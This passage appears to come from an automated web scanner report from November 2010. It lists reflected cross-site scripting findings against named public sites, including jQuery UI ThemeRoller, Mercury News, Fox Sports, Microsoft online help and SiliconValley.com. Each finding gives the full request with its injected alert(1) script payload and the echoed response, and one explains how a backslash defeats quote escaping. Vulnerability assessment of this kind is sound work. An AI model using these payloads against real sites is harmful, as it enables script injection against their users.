   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
aaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px85bb8"><script>alert(1)</script>18668a6627e&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

3.192. http://jqueryui.com/themeroller/ [opacityOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1431d"><script>alert(1)</script>4705b847df6 was submitted in the opacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=301431d"><script>alert(1)</script>4705b847df6&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:10:23 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=301431d"><script>alert(1)</script>4705b847df6&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all
...[SNIP]...

3.193. http://jqueryui.com/themeroller/ [opacityShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f99f"><script>alert(1)</script>6d451900ce7 was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=304f99f"><script>alert(1)</script>6d451900ce7&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:11:01 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=304f99f"><script>alert(1)</script>6d451900ce7&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

3.194. http://jqueryui.com/themeroller/ [thicknessShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb954"><script>alert(1)</script>367a87104dd was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8pxcb954"><script>alert(1)</script>367a87104dd&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:11:11 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8pxcb954"><script>alert(1)</script>367a87104dd&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

3.195. http://mercurynews.stats.com/fb/scoreboard.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mercurynews.stats.com
Path:   /fb/scoreboard.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4e21"><script>alert(1)</script>284f253951f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fb/scoreboard.asp?e4e21"><script>alert(1)</script>284f253951f=1 HTTP/1.1
Host: mercurynews.stats.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=10
Date: Mon, 15 Nov 2010 02:08:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 52877

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Sports - NFL - Scoreboards - San Jose Mercury News</title>

<div id="omniture" style="display:none;">
<!-- S
...[SNIP]...
<META content="60;/fb/scoreboard.asp?e4e21"><script>alert(1)</script>284f253951f=1&amp;meta=true" http-equiv="Refresh">
...[SNIP]...

3.196. http://msn.foxsports.com/nfl/story/San-Francisco-49ers-notebook-Michael-Lewis-feeds-new-team-St-Louis-Rams-information-about-his-old-team-70614230 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /nfl/story/San-Francisco-49ers-notebook-Michael-Lewis-feeds-new-team-St-Louis-Rams-information-about-his-old-team-70614230

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9704c'-alert(1)-'518f21c5656 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nfl/story/San-Francisco-49ers-notebook-Michael-Lewis-feeds-new-team-St-Louis-Rams-information-about-his-old-team-70614230?9704c'-alert(1)-'518f21c5656=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 234313
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=AE79DE3284C33592F90AA3B7DC247CB6; Path=/
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=27
Date: Sun, 14 Nov 2010 23:14:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/nfl/story/San-Francisco-49ers-notebook-Michael-Lewis-feeds-new-team-St-Louis-Rams-information-about-his-old-team-70614230?9704c'-alert(1)-'518f21c5656=1';

       startComments('StoryComments', '21950027'); // load up team comments
   </script>
...[SNIP]...

3.197. http://newspaperads.mercurynews.com/FSI/Page.aspx [version parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://newspaperads.mercurynews.com
Path:   /FSI/Page.aspx

Issue detail

The value of the version request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 454b3\'%3balert(1)//851c49b677b was submitted in the version parameter. This input was echoed as 454b3\\';alert(1)//851c49b677b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /FSI/Page.aspx?advid=200177&loc=53824&fsi=14784&version=Mercury454b3\'%3balert(1)//851c49b677b HTTP/1.1
Host: newspaperads.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; s_cc=true; ZZFLSH=29; location=53824; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 15 Nov 2010 02:09:23 GMT
Server: Microsoft-IIS/6.0
X-Server-Name: HW3
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48110


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" x
...[SNIP]...
newspaperads.mercurynews.com';

s_pageName = '';
s_channel = 'FSI';
s_prop4 = 'FSI | | - |';
s_prop3 = 'FSI |';
s_prop5 = 'FSI |';
s_prop13 = 'FSI |';
s_prop20 = 'FSI | | 53824 | | 14784 | Mercury454b3\\';alert(1)//851c49b677b | - | Page 1';
s_az.pageName = 'FSI | Page View';
s_az.channel = 'FSI';
s_az.pageType = '';
s_az.prop1 = '';
s_az.prop2 = '';
s_az.prop3 = 'FSI |';
s_az.prop4 = 'FSI | | | - |';
s_az.prop5 = 'FSI |'
...[SNIP]...

3.198. http://onlinehelp.microsoft.com/en-US/bing/ff808523.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /en-US/bing/ff808523.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8b9a"><script>alert(1)</script>a63a2a31e98 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en-US/bing/ff808523.aspx?f8b9a"><script>alert(1)</script>a63a2a31e98=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: A=I&I=AxUFAAAAAABtBwAA4XNQCXpBTPk7cZerNYh7mA!!&M=1; domain=.microsoft.com; expires=Wed, 14-Nov-2040 23:14:04 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Wed, 14-Nov-2040 23:14:04 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 23:14:04 GMT
Content-Length: 40552


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Get%20the%20latest%20news&body=http://onlinehelp.microsoft.com/en-us/bing/ff808523.aspx?f8b9a"><script>alert(1)</script>a63a2a31e98=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

3.199. http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /en-US/bing/ff808535.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6070d"><script>alert(1)</script>ad7ec223932 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en-US/bing/ff808535.aspx?6070d"><script>alert(1)</script>ad7ec223932=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: A=I&I=AxUFAAAAAAAFCgAAMPi17N5G3bmz8kqV4D9PUg!!&M=1; domain=.microsoft.com; expires=Wed, 14-Nov-2040 23:14:04 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Wed, 14-Nov-2040 23:14:04 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 23:14:03 GMT
Content-Length: 43681


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Help&body=http://onlinehelp.microsoft.com/en-us/bing/ff808535.aspx?6070d"><script>alert(1)</script>ad7ec223932=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

3.200. https://secure.www.mercurynews.com/portlet/registration/html/info.jsp [rFreeForm parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.www.mercurynews.com
Path:   /portlet/registration/html/info.jsp

Issue detail

The value of the rFreeForm request parameter is copied into an HTML comment. The payload c15c0--><script>alert(1)</script>f18d1ae576c was submitted in the rFreeForm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /portlet/registration/html/info.jsp?rFreeForm=8101685c15c0--><script>alert(1)</script>f18d1ae576c HTTP/1.1
Host: secure.www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 15 Nov 2010 02:09:35 GMT
Server: Apache/2.0.52 (Red Hat)
X-ATG-Version: ATGPlatform/7.1p2 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Set-Cookie: JSESSIONID=ZWT54CTJMPJ20CUUCBWCFFA; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Length: 1676
Connection: close
Content-Type: text/html; charset=UTF-8

<html><head><script><!--
           window.focus();
       //--></script><link type="text/css" rel="stylesheet" href='https://secure.extras.mnginteractive.com/live/css/MNGiDefaultStyles.css'><script>
           function o
...[SNIP]...
<!-- BEGIN FREEFORM RENDER, ID 8101685c15c0--><script>alert(1)</script>f18d1ae576c -->
...[SNIP]...

3.201. https://secure.www.mercurynews.com/registration/ [rPage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.www.mercurynews.com
Path:   /registration/

Issue detail

The value of the rPage request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6fb02</script><script>alert(1)</script>47f9d8515fe was submitted in the rPage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /registration/?rPage=login6fb02</script><script>alert(1)</script>47f9d8515fe&url=http%3A%2F%2Fwww.mercurynews.com%2F&eRightsSessionExpired=true HTTP/1.1
Host: secure.www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 15 Nov 2010 02:09:38 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: JSESSIONID=0QISC2X0JL2UMCUUCBWCFFI; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Language: en-US
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Registration'><title>Registration - San Jose Mercury News</title><!-- get profile info --><
...[SNIP]...
rBrand = getBrand2(s_account);
var PageName = "Registration";
var SectionName = "Registration";
var ArticleTitle = "null";
           var FriendlyName = "Registration: login6fb02</script><script>alert(1)</script>47f9d8515fe";
           var domainName = getDomainName();
           userObj = new omniObj();
           userObj.load();
           userObj.update();
           userObj.save();
/* You may give each page an identifying name, server, and cha
...[SNIP]...

3.202. https://secure.www.mercurynews.com/registration/ [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.www.mercurynews.com
Path:   /registration/

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 586df"><script>alert(1)</script>cb76424f007 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /registration/?rPage=login&url=http%3A%2F%2Fwww.mercurynews.com%2F586df"><script>alert(1)</script>cb76424f007&eRightsSessionExpired=true HTTP/1.1
Host: secure.www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 15 Nov 2010 02:09:39 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: JSESSIONID=XBSY2AYHL45GQCUUCAWSFEY; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Language: en-US
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Registration'><title>Registration - San Jose Mercury News</title><!-- get profile info --><
...[SNIP]...
<a href="/registration?rPage=register&url=http://www.mercurynews.com/586df"><script>alert(1)</script>cb76424f007&register=yes">
...[SNIP]...

3.203. https://secure.www.siliconvalley.com/registration/ [rPage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.www.siliconvalley.com
Path:   /registration/

Issue detail

The value of the rPage request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6715d</script><script>alert(1)</script>1b9e22d4bd9 was submitted in the rPage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /registration/?rPage=login6715d</script><script>alert(1)</script>1b9e22d4bd9&url=http%3A%2F%2Fwww.siliconvalley.com%2F&eRightsSessionExpired=true HTTP/1.1
Host: secure.www.siliconvalley.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 15 Nov 2010 02:09:40 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: JSESSIONID=LX5GZDZ3HBPL0CUUCAXCFEY; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Language: en-US
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Registration'><title>Registration - SiliconValley.com</title><!-- get profile info --><!--
...[SNIP]...
rBrand = getBrand2(s_account);
var PageName = "Registration";
var SectionName = "Registration";
var ArticleTitle = "null";
           var FriendlyName = "Registration: login6715d</script><script>alert(1)</script>1b9e22d4bd9";
           var domainName = getDomainName();
           userObj = new omniObj();
           userObj.load();
           userObj.update();
           userObj.save();
/* You may give each page an identifying name, server, and cha
...[SNIP]...

3.204. https://secure.www.siliconvalley.com/registration/ [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.www.siliconvalley.com
Path:   /registration/

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13c8a"><script>alert(1)</script>4c191ca7cfb was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /registration/?rPage=login&url=http%3A%2F%2Fwww.siliconvalley.com%2F13c8a"><script>alert(1)</script>4c191ca7cfb&eRightsSessionExpired=true HTTP/1.1
Host: secure.www.siliconvalley.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 15 Nov 2010 02:09:41 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: JSESSIONID=4ISA2QSZCYI1ECUUCAXCFEY; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Language: en-US
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Registration'><title>Registration - SiliconValley.com</title><!-- get profile info --><!--
...[SNIP]...
<a href="/registration?rPage=register&url=http://www.siliconvalley.com/13c8a"><script>alert(1)</script>4c191ca7cfb&register=yes">
...[SNIP]...

3.205. http://shops.godaddy.com/Blankterrmall/BRAND-NEW-P90X-Extreme-Home-Fitness-13-DVD-ONLY-WITH-GUIDES-INCLUDED/ [isc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shops.godaddy.com
Path:   /Blankterrmall/BRAND-NEW-P90X-Extreme-Home-Fitness-13-DVD-ONLY-WITH-GUIDES-INCLUDED/

Issue detail

